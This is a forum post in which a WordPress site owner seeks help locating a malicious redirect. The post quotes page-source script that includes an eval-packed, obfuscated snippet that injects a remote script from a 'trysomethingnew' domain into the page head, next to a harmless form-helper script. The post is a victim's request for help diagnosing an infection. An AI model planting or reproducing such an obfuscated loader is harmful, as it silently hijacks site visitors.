I am trying to find and understand how a page redirect is happening on a Wordpress site. I have taken the site down and am working my way through it, trying to work out where the exploit is.
The redirect seems to go under the name of ẗrysomethingnew"and I have found reference to this in the page source file looked at through Firefox.
Code:
/style><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><script type="text/javascript">(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script>
Iḿ not sure if this is the offending script but it does contain the words ẗrysomethingnew." I have copied everthing between the <script> tags.
Where do I start when trying to find this? I can make head nor tail of it. Is there anything there to help identify where the script is?
The site is running on a clean install of Wordpress (fully updated) and the redirect is not happening now but the script is still there.
Any ideas?
Cheers.